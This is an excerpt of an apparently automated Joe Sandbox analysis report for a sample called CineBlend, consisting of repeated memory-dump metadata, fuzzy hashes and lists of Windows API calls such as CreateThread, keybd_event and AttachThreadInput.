                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID:
                                          • API String ID: 1385522511-0
                                          • Opcode ID: f3669804b74ef3f911ecffb94a4028d7182ad45e838e588d2c14e8e23abc660f
                                          • Instruction ID: d831195126d37cb89a3ccf39f8fe1729f672db12f63bb480ec575a4a7d5361ba
                                          • Opcode Fuzzy Hash: f3669804b74ef3f911ecffb94a4028d7182ad45e838e588d2c14e8e23abc660f
                                          • Instruction Fuzzy Hash: 83329D75A0020A9FCF10CF58C884BBABBF5EF45714F1584E9E916AB261C734EE45EB90
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: LoadString
                                          • String ID:
                                          • API String ID: 2948472770-0
                                          • Opcode ID: 57c78ee44d2cf704b7d11489d8602bab7ad67062fcb2a5cc210a9d87992dcbf3
                                          • Instruction ID: 07535804edfb424763ac0bd496652878841bcbb123da8bd51bf2c623acae03b8
                                          • Opcode Fuzzy Hash: 57c78ee44d2cf704b7d11489d8602bab7ad67062fcb2a5cc210a9d87992dcbf3
                                          • Instruction Fuzzy Hash: 02D12A75A4420AEFCB14EF98C491EADBBF5FF48310F548199E915AB291DB30AE41CF90
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b41da16d42e66154d57c2baf8b30dcc24b3b7ff4d453ff5b76e293b390cef658
                                          • Instruction ID: bc7ebf754cef4cf0bfe07f4e3909e37431b147cfee13ce9ae341d1bfd9abbf12
                                          • Opcode Fuzzy Hash: b41da16d42e66154d57c2baf8b30dcc24b3b7ff4d453ff5b76e293b390cef658
                                          • Instruction Fuzzy Hash: BE51B475A00109AFDB10DF68E851BB97BE2FB85364F19C1E8F8189B391D735AD42CB50
                                          APIs
                                            • Part of subcall function 00B4663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B4668B,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B4664A
                                            • Part of subcall function 00B4663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B4665C
                                            • Part of subcall function 00B4663E: FreeLibrary.KERNEL32(00000000,?,?,00B4668B,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B4666E
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B466AB
                                            • Part of subcall function 00B46607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B85657,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B46610
                                            • Part of subcall function 00B46607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B46622
                                            • Part of subcall function 00B46607: FreeLibrary.KERNEL32(00000000,?,?,00B85657,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B46635
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Library$Load$AddressFreeProc
                                          • String ID:
                                          • API String ID: 2632591731-0
                                          • Opcode ID: 2f894230e5b867b756bf3eea04db09b620ca603d3ed42e4e6d55a42157140b4c
                                          • Instruction ID: c469371b83117ec8bd8b3a10f30764406f47b51dcfc4f3c7d9c9fda9dcab54b6
                                          • Opcode Fuzzy Hash: 2f894230e5b867b756bf3eea04db09b620ca603d3ed42e4e6d55a42157140b4c
                                          • Instruction Fuzzy Hash: 5D11E372640205BBCF24BB20C802BEDBBE59F51710F1144AEF482A61C2EEB5DB05EB52
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: 8c66adb75292db5582518b792686d7a8ee86fc7bf043b30a12d5bf451f89d668
                                          • Instruction ID: b73e4379690f97fff1203bbbe0ffde0b7193c1c8c1e446b2b2fa72d756d1e157
                                          • Opcode Fuzzy Hash: 8c66adb75292db5582518b792686d7a8ee86fc7bf043b30a12d5bf451f89d668
                                          • Instruction Fuzzy Hash: 5A1118B690410AAFCB05DF58E945A9E7BF4EF48310F1180A9F819AB311DA31EE11CBA5
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                          • Instruction ID: d30071c49a2e444d34396c4690c9f6867eaef28ef56940347cb11d6dd67aa0f3
                                          • Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                          • Instruction Fuzzy Hash: 4AF0CD36501A1456D6313A67DC0576A33D8CF42334F1487E6F539971D1EB78D80287D2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID:
                                          • API String ID: 176396367-0
                                          • Opcode ID: e9cd17c5cbaedd8edb8b09e85265a98eb37cae1070fabcd04313bd3d0c823b07
                                          • Instruction ID: d17f5cea201a298072105abbf7b503b8b435022eb147d7463b32da8b446bb997
                                          • Opcode Fuzzy Hash: e9cd17c5cbaedd8edb8b09e85265a98eb37cae1070fabcd04313bd3d0c823b07
                                          • Instruction Fuzzy Hash: 52F0AFB36016046ED714AF29D806FA6BBD8EB44360F10866AFB19CB2D1DB35E5108AA4
                                          APIs
                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00BBF987
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: EnvironmentVariable
                                          • String ID:
                                          • API String ID: 1431749950-0
                                          • Opcode ID: 378a994a69b0b901f903da8de22baf1d0cb863fb2ad6fb84cad7f5b5bfd99fe5
                                          • Instruction ID: 32ba139ff29c2d59ff76fc8f7730645566c214fb8e2127ccc6181d4a32c561e4
                                          • Opcode Fuzzy Hash: 378a994a69b0b901f903da8de22baf1d0cb863fb2ad6fb84cad7f5b5bfd99fe5
                                          • Instruction Fuzzy Hash: A3F01972610205BFCB05EBA5DC4AEAFB7E8EF4A720F004095F505AB261EA74AA41C761
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B7319C,00000001,00000364,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B75031
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 1fbff4d09d0bff831616b8eaedd1c5517054cbd34362576970c37d99f723dad2
                                          • Instruction ID: d9311b4e13630acb4997cf6324f728c3873ff65bf14986036d1a22208cc279e4
                                          • Opcode Fuzzy Hash: 1fbff4d09d0bff831616b8eaedd1c5517054cbd34362576970c37d99f723dad2
                                          • Instruction Fuzzy Hash: 8FF0E936551E24A7DB311E26DC01B5A77C8EF417E0F14C091F83CD7190EAB4D81186F4
                                          APIs
                                            • Part of subcall function 00B73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5
                                          • _free.LIBCMT ref: 00B80164
                                            • Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
                                            • Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Heap$AllocateErrorFreeLast_free
                                          • String ID:
                                          • API String ID: 314386986-0
                                          • Opcode ID: 4b32a033446cef2ee561aec414ef2ba888b0d19db61882311810b63bf46e2194
                                          • Instruction ID: a9514b0e4b2efcb74570806f0cf9cda1c0dbe0a2da54beeb6e86c375a6f5d39f
                                          • Opcode Fuzzy Hash: 4b32a033446cef2ee561aec414ef2ba888b0d19db61882311810b63bf46e2194
                                          • Instruction Fuzzy Hash: AFF06DB2005704CFE334AF10D885B92B7E8EB04725F10886EE69E97A91DB75A848CB94
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 679ead4ecd31f7a7df0852e3c82c494b0a59aa907be899d6307e8d50fb8c1dcf
                                          • Instruction ID: 6d0d54d7c344b52ddae7193d4d7d6c7a854d7af4d10ce18c487477500134a17c
                                          • Opcode Fuzzy Hash: 679ead4ecd31f7a7df0852e3c82c494b0a59aa907be899d6307e8d50fb8c1dcf
                                          • Instruction Fuzzy Hash: 6EE0E521250621A6DA3027729C01B5A76DCEF41BA0F1481E1EC6D96390DF24CD00B1A0
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 220f73e3167fe26a50316a564017161563b58de49db30e9d6a4bb86405e57eea
                                          • Instruction ID: 88c91196acf9453c46adbd3f8e21999b3c6a208b4bf16ee8ce6daa325d71a9a2
                                          • Opcode Fuzzy Hash: 220f73e3167fe26a50316a564017161563b58de49db30e9d6a4bb86405e57eea
                                          • Instruction Fuzzy Hash: DDF03975505702CFCB389F64D8E0816BBE4FF1532932489BEE5D686620C7319C40EF11
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID:
                                          • API String ID: 2638373210-0
                                          • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                          • Instruction ID: da2d7153755f88daea39d9a097bed8952d22f0f7e7d8087b3478205f8316cc16
                                          • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                          • Instruction Fuzzy Hash: 8EF0F87550020DFFDF05DF90C941E9E7BB9FB04318F208485F9159A151C336EA21EBA1
                                          APIs
                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00B43963
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_
                                          • String ID:
                                          • API String ID: 1144537725-0
                                          • Opcode ID: 0bfba285635e7d34d568fd1ffadb9a87c817a98e9c4754194dea8feab5b4ebca
                                          • Instruction ID: f1f364a0feefaf59f9bc362752c1a6d538478c486062febd43c83c46c70ba139
                                          • Opcode Fuzzy Hash: 0bfba285635e7d34d568fd1ffadb9a87c817a98e9c4754194dea8feab5b4ebca
                                          • Instruction Fuzzy Hash: 7AF0A7709003049FE7529F24DC45BD97BFCB701708F0040E9A28897291DB744798CF41
                                          APIs
                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B43A76
                                            • Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: LongNamePath_wcslen
                                          • String ID:
                                          • API String ID: 541455249-0
                                          • Opcode ID: 3aeef0d3c3a768e75dc3e858384a2c26891c1bc229ee1b39e8fa0b7f824754fd
                                          • Instruction ID: 2011c7f0384c480b6748b4ecbb9b38f7dfcbc0b34785429a5bce0a1a6e6dc743
                                          • Opcode Fuzzy Hash: 3aeef0d3c3a768e75dc3e858384a2c26891c1bc229ee1b39e8fa0b7f824754fd
                                          • Instruction Fuzzy Hash: 4CE0867290012457C710A6589C05FEA77DDDB887A0F0440B1BC45D7254D9609D809690
                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00BAE857
                                            • Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FolderPath_wcslen
                                          • String ID:
                                          • API String ID: 2987691875-0
                                          • Opcode ID: 52ffb5baf3f3adb3e32ef8797d3095698e57ba97cf1ad416c0555743495f3e6d
                                          • Instruction ID: ff89a30281beb113cd712e4c5afe4aa82a14a91662c5c2671811ebcad85eb76d
                                          • Opcode Fuzzy Hash: 52ffb5baf3f3adb3e32ef8797d3095698e57ba97cf1ad416c0555743495f3e6d
                                          • Instruction Fuzzy Hash: FAD05EA59002282BDF60A6749C0DDBB7AACCB40210F0006A178ADD3152EE30EE448AA0
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 00BB1306
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: e3cd986f04f02ec1eef6fc92a8574aea766554681eb11e3335c1dc59b7776aec
                                          • Instruction ID: 87ba0e55b70b5396831cdbc946c1bc0251a92d4704994311a3ddf693a16681a2
                                          • Opcode Fuzzy Hash: e3cd986f04f02ec1eef6fc92a8574aea766554681eb11e3335c1dc59b7776aec
                                          • Instruction Fuzzy Hash: CFD05EB1422314BF9B2C8B55CD5ACB776DCEA01651380156EB402E2940F5E0FD00CAA0
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00B80A84,?,?,00000000,?,00B80A84,00000000,0000000C), ref: 00B80737
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 07a4a9814090e838b7491c17a14f1f9e60a8c3532fbf4fa0cdd894543fb23d07
                                          • Instruction ID: 6fa01bf73b62e946df31bab49563ecf6a86353104f7fbba49b9daec5464eb004
                                          • Opcode Fuzzy Hash: 07a4a9814090e838b7491c17a14f1f9e60a8c3532fbf4fa0cdd894543fb23d07
                                          • Instruction Fuzzy Hash: 83D06C3200010DBBDF028F84DD06EDA3BAAFB48714F014000BE5866020C732E821AB90
                                          APIs
                                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00B5FC86
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B9FCB8
                                          • IsIconic.USER32(00000000), ref: 00B9FCC1
                                          • ShowWindow.USER32(00000000,00000009), ref: 00B9FCCE
                                          • SetForegroundWindow.USER32(00000000), ref: 00B9FCD8
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B9FCEE
                                          • GetCurrentThreadId.KERNEL32 ref: 00B9FCF5
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B9FD01
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B9FD12
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B9FD1A
                                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00B9FD22
                                          • SetForegroundWindow.USER32(00000000), ref: 00B9FD25
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9FD3A
                                          • keybd_event.USER32(00000012,00000000), ref: 00B9FD45
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9FD4F
                                          • keybd_event.USER32(00000012,00000000), ref: 00B9FD54
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9FD5D
                                          • keybd_event.USER32(00000012,00000000), ref: 00B9FD62
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9FD6C
                                          • keybd_event.USER32(00000012,00000000), ref: 00B9FD71
                                          • SetForegroundWindow.USER32(00000000), ref: 00B9FD74
                                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00B9FD9B
                                          Strings
                                          Memory Dump Source
